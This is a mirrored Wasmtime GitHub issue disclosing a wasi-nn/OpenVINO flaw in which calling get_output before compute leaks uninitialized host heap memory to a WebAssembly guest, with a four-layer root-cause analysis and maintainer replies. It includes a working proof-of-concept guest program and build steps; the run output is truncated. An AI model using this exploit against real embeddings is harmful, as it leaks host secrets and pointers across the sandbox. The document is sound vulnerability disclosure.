Stream: git-wasmtime

Topic: wasmtime / issue #14437 wasi-nn: host memory disclosure v...


view this post on Zulip Wasmtime GitHub notifications bot (Sep 28 2026 at 14:33):

karalabe opened issue #14437:

This was a CVE submitted but deemed in a not-yet-supported module, and was asked to publish it here.


Summary

Wasmtime's wasi-nn implementation (preview1/WITX ABI, OpenVINO backend) allows a WebAssembly guest to call get_output on an execution context before ever calling compute. The call returns nn_errno::success and copies the OpenVINO output tensor into guest linear memory — but that tensor was allocated (as ordinary, uninitialized host heap memory) when the execution context was created and has never been written by any inference. The guest therefore receives leftover host process heap memory across the WebAssembly sandbox boundary. In embeddings that run untrusted guests with wasi-nn enabled, this discloses live host pointers (ASLR defeat) and residual sensitive data from prior host heap activity. On Linux the primitive is deterministic; on macOS it is probabilistic (the allocator returns freed pages to the kernel more aggressively, so reads sometimes come back as zeros).

Details

Affected component: wasmtime-wasi-nn, WITX ("preview1-style") API wasi_ephemeral_nn.get_output, OpenVINO backend, CPU device, static output shapes.

Verified versions: wasmtime main @ 11eac9de8693e1a69f86815d1a58918edd5c1785 (2026-09-26, reports itself as 50.0.0-dev), openvino crate 0.11.0, OpenVINO runtime 2026.4.0 (tag 2026.4.0, commit 99c81491cc3). The implicated code paths are long-standing; both macOS arm64 and Linux arm64 were tested (x86_64 Linux uses the same plugin sources).

The vulnerability is a missing state check across four layers; each layer assumes the one below it enforces ordering, and none does:

  1. Wasmtime, WITX host call — crates/wasi-nn/src/witx.rs:216-241. get_output fetches the output tensor from the execution context and copies it into guest memory (destination[..tensor.data.len()].copy_from_slice(&tensor.data), line 235). There is no record of whether compute was ever invoked on the context, and no error is raised. It returns success plus the byte count.

  2. Wasmtime, OpenVINO backend — crates/wasi-nn/src/backend/openvino.rs. init_execution_context creates the openvino::InferRequest (lines 80-86). get_output (lines 178-196) calls self.0.get_output_tensor_by_index(i) and output_name.get_raw_data()?.to_vec(), again with no compute-state check.

  3. openvino-rs bindings — src/request.rs:78-86 (get_output_tensor_by_index) is a thin wrapper over the C API; it adds no checks.

  4. OpenVINO runtime (CPU plugin) — at tag 2026.4.0:

    • src/plugins/intel_cpu/src/infer_request.cpp:66-75: the InferRequest constructor allocates all static-shape input and output tensors up front (init_tensor → ov::make_tensor(model_prec, tensor_shape) at line 577) — before the first infer().
    • src/inference/src/dev/make_tensor.cpp:311-319 and :373-379: allocation goes through Allocator::allocate(byte_size); initialize_elements only value-constructs element::string elements. Numeric element storage is left completely uninitialized.
    • src/core/src/runtime/allocator.cpp:11-29: the default allocator is ::operator new(bytes) (or posix_memalign), which never zeroes.
    • src/inference/src/dev/isync_infer_request.cpp:216-219: get_tensor simply returns the tensor pointer — no lazy allocation, no state validation.
    • No code in the constructor or pre-infer() path zeroes output tensors (the plugin's only nullify() call sites concern input edges for zero-dim workarounds and state buffers: graph.cpp:866-872, memory_state.cpp:146-215).

Net effect: load → init_execution_context → get_output(0, ...) yields whatever bytes the host allocator happened to place in the output tensor's storage.

Because the bytes come from the host allocator's recycled chunks, their content depends on prior heap activity of the host process. Observed in practice:

Scope notes:

Suggested fix: track per-execution-context state in wasmtime and fail get_output (e.g. nn_errno::runtime_error / invalid_argument) until compute has completed successfully at least once. Defense in depth: zero-initialize numeric tensor storage in OpenVINO's allocator (performance trade-off), or have wasmtime refuse to return tensor data the backend has not written.

PoC

Everything needed is inline below. Directory layout to create:

wasmtime/                     # git clone of wasmtime (also builds the CLI)
poc/
  model.xml
  model.bin
  guest/Cargo.toml
  guest/src/main.rs           # basic PoC, runs under the plain wasmtime CLI
  guest/src/bin/seeded.rs     # seeded variant, runs under poc/host
  host/Cargo.toml             # custom embedding runner with a heap-spray hook
  host/src/main.rs

Tested on macOS 26.6.2 (arm64) and Debian trixie (arm64, Docker); x86_64 Linux works the same way.

Step 1 — install the OpenVINO runtime (2026.4.0) via pip and create the unversioned soname symlinks that openvino-finder expects:

python3 -m venv venv && venv/bin/pip install openvino
OVLIBS=$(dirname $(find venv -name 'libopenvino_c.*' | head -1))
for f in libopenvino_c libopenvino libopenvino_ir_frontend; do
  ln -sf $(ls $OVLIBS/$f.*.* | head -1) $OVLIBS/$f.so        # use .dylib on macOS
done

Step 2 — build wasmtime (wasi-nn is on by default) and add the guest target:

git clone https://github.com/bytecodealliance/wasmtime
(cd wasmtime && cargo build --release)
rustup target add wasm32-wasip1

Step 3 — model files. poc/model.xml (minimal static-shape graph; f32 [1,1024] output = 4096 bytes):

<?xml version="1.0"?>
<net name="minimal-static" version="11">
  <layers>
    <layer id="0" name="input" type="Parameter" version="opset1">
      <data shape="1,1024" element_type="f32"/>
      <output><port id="0" precision="FP32"><dim>1</dim><dim>1024</dim></port></output>
    </layer>
    <layer id="1" name="relu" type="ReLU" version="opset1">
      <input><port id="0" precision="FP32"><dim>1</dim><dim>1024</dim></port></input>
      <output><port id="1" precision="FP32"><dim>1</dim><dim>1024</dim></port></output>
    </layer>
    <layer id="2" name="output" type="Result" version="opset1">
      <input><port id="0" precision="FP32"><dim>1</dim><dim>1024</dim></port></input>
    </layer>
  </layers>
  <edges>
    <edge from-layer="0" from-port="0" to-layer="1" to-port="0"/>
    <edge from-layer="1" from-port="1" to-layer="2" to-port="0"/>
  </edges>
</net>

poc/model.bin (weights, unused by this graph): printf '\0\0\0\0' > poc/model.bin

Step 4 — the basic guest. poc/guest/Cargo.toml:

[package]
name = "guest"
version = "0.1.0"
edition = "2021"

[dependencies]
wasi-nn = "0.6"

poc/guest/src/main.rs — the whole attack is: do not call compute:

use wasi_nn::{ExecutionTarget, GraphBuilder, GraphEncoding, TensorType};

const MARKER: &[u8; 16] = b"HOSTSECRET_C0DE!"; // only used by the seeded variant

fn main() {
    let xml = include_bytes!("../../model.xml");
    let bin = include_bytes!("../../model.bin");
    let graph = GraphBuilder::new(GraphEncoding::Openvino, ExecutionTarget::CPU)
        .build_from_bytes([xml.as_slice(), bin.as_slice()]).unwrap();
    let mut ctx = graph.init_execution_context().unwrap();

    // No set_input, no compute — straight to get_output.
    let mut buf = vec![0u8; 1 << 20];
    let n = ctx.get_output(0, &mut buf).unwrap(); // returns Ok(4096)
    report("BEFORE compute", &buf[..n]);

    // Contrast: defined output after a real inference (ReLU(-1) = 0).
    let input = vec![-1.0f32; 1024];
    ctx.set_input(0, TensorType::F32, &[1, 1024], &input).unwrap();
    ctx.compute().unwrap();
    let n = ctx.get_output(0, &mut buf).unwrap();
    report("AFTER compute ", &buf[..n]);
}

fn report(label: &str, out: &[u8]) {
    let nz = out.iter().filter(|&&b| b != 0).count();
    println!("[{label}] {} bytes, {nz} non-zero", out.len());
    let hits: Vec<usize> = out.windows(MARKER.len()).enumerate()
        .filter_map(|(i, w)| (w == MARKER).then_some(i)).take(4).collect();
    if !hits.is_empty() {
        println!("[{label}] !!! HOST MARKER at offsets {hits:?}");
    }
    print!("[{label}] hex[0..64]:");
    for b in &out[..64.min(out.len())] { print!(" {b:02x}"); }
    println!();
}

Step 5 — build and run (Linux):

(cd poc/guest && cargo build --release --target wasm32-wasip1)
LD_LIBRARY_PATH=$OVLIBS wasmtime/target/release/wasmtime run --wasi nn \
    poc/guest/target/wasm32-wasip1/release/guest.wasm

Observed on Linux (very first run, unmodified CLI, no heap
[message truncated]

view this post on Zulip Wasmtime GitHub notifications bot (Sep 28 2026 at 14:46):

bjorn3 commented on issue #14437:

No unsafe code is used in wasi-nn for pytorch, openvino and onnx aside from implementing Send and Sync for some types, so if this indeed leaks host memory, that means these crates are unsound and the vulnerability is on their side. For winml some unsafe code is used. Haven't looked if in that case wasi-nn or winml is to blame.

view this post on Zulip Wasmtime GitHub notifications bot (Sep 28 2026 at 15:33):

alexcrichton commented on issue #14437:

cc @jlb6740 and @rahulchaphalkar -- y'all are likely interested in this one

view this post on Zulip Wasmtime GitHub notifications bot (Sep 28 2026 at 15:33):

alexcrichton added the wasi-nn label to Issue #14437.

view this post on Zulip Wasmtime GitHub notifications bot (Sep 28 2026 at 18:42):

shleder commented on issue #14437:

Host memory disclosure prior to execution is a critical boundary violation for untrusted guest execution.

Whenever an FFI or host function allocates uninitialized host memory buffers and exposes them to guest address spaces before execution completion, residual host memory (including previously freed tokens or keys) leaks into guest memory. Zero-initializing output buffers or strictly enforcing state transitions before output buffers can be retrieved is essential for fail-closed isolation.

Disclaimer: I am the author/maintainer of Vetto, an unprivileged process sandbox runtime for AI coding agents.

view this post on Zulip Wasmtime GitHub notifications bot (Oct 06 2026 at 21:13):

rahulchaphalkar commented on issue #14437:

I'll take a look at this, thanks

view this post on Zulip Wasmtime GitHub notifications bot (Oct 09 2026 at 01:01):

alexcrichton added the bug label to Issue #14437.


Last updated: Oct 11 2026 at 04:10 UTC